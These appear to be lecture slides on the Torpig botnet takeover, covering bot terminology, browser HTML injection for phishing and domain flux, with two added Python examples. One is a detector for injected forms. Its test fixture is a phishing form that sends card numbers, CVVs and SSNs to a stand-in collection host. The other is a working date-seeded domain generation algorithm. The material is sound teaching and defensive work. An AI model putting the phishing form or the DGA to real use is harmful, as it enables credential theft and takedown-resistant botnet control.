torpig - Botnet Terminology How to Steal a Botnet and What...

How to Steal a Botnet and What Can Happen When You Do
Richard A. Kemmerer (kemm@cs.ucsb.edu)
Security Group, Department of Computer Science, University of California, Santa Barbara
Torpig Takeover, CS177, 2011

Botnet Terminology
• Bot
  – an application that performs some action or set of actions on behalf of a remote controller
  – installed on a victim machine (a "zombie")
  – modular (plug in your own functionality, exploit, or payload)
• Botnet
  – a network of infected machines controlled by a malicious entity
• Control channel
  – required to send commands to the bots and to collect results and status messages
  – usually IRC, HTTP, HTTPS, or peer-to-peer
• Bot herder
  – aka botmaster or controller
  – owns the control channel and sends commands to the botnet army
  – motivations are usually power or money

Torpig
• Trojan horse
  – distributed via the Mebroot "malware platform"
  – injects itself as a DLL into 29 different applications
  – steals sensitive information (passwords, HTTP POST data)
  – HTTP injection for phishing
  – uses domain flux
• Mebroot
  – spreads via drive-by downloads
  – sophisticated rootkit (overwrites the master boot record)

Torpig: Behind the scenes
[Diagram: innocent victim, "hacked" web servers, "drive-by download" server, injection server; labelled flows: Mebroot download, commands + Torpig, stolen data]

Torpig HTML Injection
• Domains of interest (~300) are stored in a configuration file
• When a domain of interest is visited
  – Torpig issues a request to the injection server
  – the server specifies a trigger page on the target domain and a URL on the injection server to be visited when the user reaches that trigger page
• When the user visits the trigger page
  – Torpig requests the injection URL from the injection server
  – Torpig injects the returned content into the user's browser
• The content is usually an HTML phishing form that asks for sensitive data
  – it reproduces the look and style of the target web site

Example Phishing Page
[Screenshot]
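Because the injected form is rendered inside the victim's own browser process, it looks like part of the genuine site even over HTTPS. One defender-side check that follows from the slides is to compare the forms the victim's browser actually rendered against the forms the real site serves (captured out of band from a clean machine) and flag any form or field that exists only in the rendered copy, or that posts to a foreign origin. The code below is an added example, not code from the slides or from the Torpig analysis; the two HTML documents, the hostnames and the field names in it are constructed for the example.

```python
"""Flag forms injected into a page by diffing it against a clean reference copy."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the names of its user-entered fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name")
            kind = (a.get("type") or "text").lower()
            # submit/hidden/button inputs carry no user-typed data, so ignore them
            if name and kind not in ("submit", "hidden", "button"):
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def collect_forms(html):
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    return parser.forms


def find_injected_forms(rendered_html, reference_html, page_url):
    """Return one finding per suspicious form in rendered_html.

    A form is suspicious if it asks for fields the reference page never asks for,
    or if its action posts to a host other than the page's own origin.
    """
    reference = collect_forms(reference_html)
    reference_sigs = {(f["action"], tuple(f["fields"])) for f in reference}
    reference_fields = {name for f in reference for name in f["fields"]}
    origin = urlparse(page_url).netloc

    findings = []
    for form in collect_forms(rendered_html):
        reasons = []
        new_fields = []
        if (form["action"], tuple(form["fields"])) not in reference_sigs:
            new_fields = [n for n in form["fields"] if n not in reference_fields]
            if new_fields:
                reasons.append("fields absent from reference page: " + ", ".join(new_fields))
        action_host = urlparse(form["action"]).netloc
        if action_host and action_host != origin:
            reasons.append("form posts to foreign origin " + action_host)
        if reasons:
            findings.append({"action": form["action"], "fields": form["fields"],
                             "new_fields": new_fields, "reasons": reasons})
    return findings


# Constructed sample: the real login page as served by the (hypothetical) bank.
REFERENCE_LOGIN = """
<html><body>
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Log in">
</form>
</body></html>
"""

# Constructed sample: the same page as seen in the infected browser, with an
# extra "verification" form in the site's style that posts to the injection server.
RENDERED_LOGIN = REFERENCE_LOGIN.replace("</body>", """
<div class="security-notice">
<form action="https://injection.example.net/collect" method="post">
  <input type="text" name="username">
  <input type="text" name="card_number">
  <input type="text" name="cvv">
  <input type="text" name="ssn">
  <input type="submit" value="Verify">
</form>
</div>
</body>""")

if __name__ == "__main__":
    for hit in find_injected_forms(RENDERED_LOGIN, REFERENCE_LOGIN, "https://bank.example.com/login"):
        print(hit["action"], "->", "; ".join(hit["reasons"]))
```

The reference copy has to come from somewhere the bot cannot touch: fetching it from the infected host would return the same injected content, since Torpig sits inside the browser process rather than on the wire.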
Example Phishing Page
[Screenshot]

Domain Flux
• Taking down a single bot has little effect on the botmaster
  – if you use a static IP address, people will block or remove the host
  – if you use a DNS name, people will block or remove the domain name
• Domain flux
  – the bots compute the control-channel domain names themselves; often the local date (system time) is the input
  – the botmaster needs to register only one of these domains
  – defenders must register all of the domains to take down the botnet
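The asymmetry on the last slide, and the takeover in the talk's title, both follow from a bot that derives its rendezvous names from the date and tries them in a fixed order: whoever holds the first name the bots try that day receives the botnet. The code below is an added example and is not the slides' or Torpig's own algorithm; the generation function is an illustrative date-seeded DGA (SHA-256 over the date, an index and a constant assumed to be baked into the binary), and the TLD list and the names `generate_domains`, `resolve_c2` and `defender_registrations` are this example's own.

```python
"""A date-seeded domain generation algorithm and both sides of the registration race."""
import hashlib
from datetime import date, timedelta
from typing import Dict, List, Optional, Set

TLDS = ("com", "net", "biz")            # assumed TLD rotation for the example
BINARY_SECRET = b"constant-in-the-bot"   # assumed constant shipped inside the bot


def generate_domains(day: date, count: int = 3) -> List[str]:
    """The ordered list of names a bot tries on `day`.

    Only the date and a constant go in, so every bot (and anyone who has
    reverse-engineered the binary) computes the same list for the same date.
    """
    names = []
    for i in range(count):
        material = f"{day.isoformat()}|{i}".encode() + BINARY_SECRET
        digest = hashlib.sha256(material).hexdigest()
        # map hex digits onto the letters a-p so the label looks like a hostname
        label = "".join(chr(ord("a") + int(c, 16)) for c in digest[:12])
        names.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return names


def resolve_c2(day: date, registrations: Dict[str, str]) -> Optional[str]:
    """Who the bot ends up talking to on `day`.

    `registrations` maps a domain to its registrant ("botmaster" or "defender").
    The bot walks its list in order and connects to the first registered name,
    exactly as a sinkhole takeover relies on.
    """
    for name in generate_domains(day):
        if name in registrations:
            return registrations[name]
    return None


def defender_registrations(start: date, days_ahead: int) -> Set[str]:
    """Every name a defender must hold to stay ahead of the botmaster for `days_ahead` days."""
    needed: Set[str] = set()
    for offset in range(days_ahead):
        needed.update(generate_domains(start + timedelta(days=offset)))
    return needed


if __name__ == "__main__":
    today = date(2009, 1, 25)   # constructed date for the demonstration
    names = generate_domains(today)
    print("bots will try, in order:", names)
    # The botmaster registered only the second name; the defender took the first.
    regs = {names[1]: "botmaster", names[0]: "defender"}
    print("bots connect to:", resolve_c2(today, regs))
    print("names a defender must hold for one week:", len(defender_registrations(today, 7)))
```

Two caveats a practitioner would add: because the input is the bot's local clock, an infected machine with a skewed date computes a different day's list and reaches nobody (or someone else) for that day, and the defender's lead lasts only as long as their registrations run ahead of the botmaster's, so the week-ahead set has to be renewed continuously.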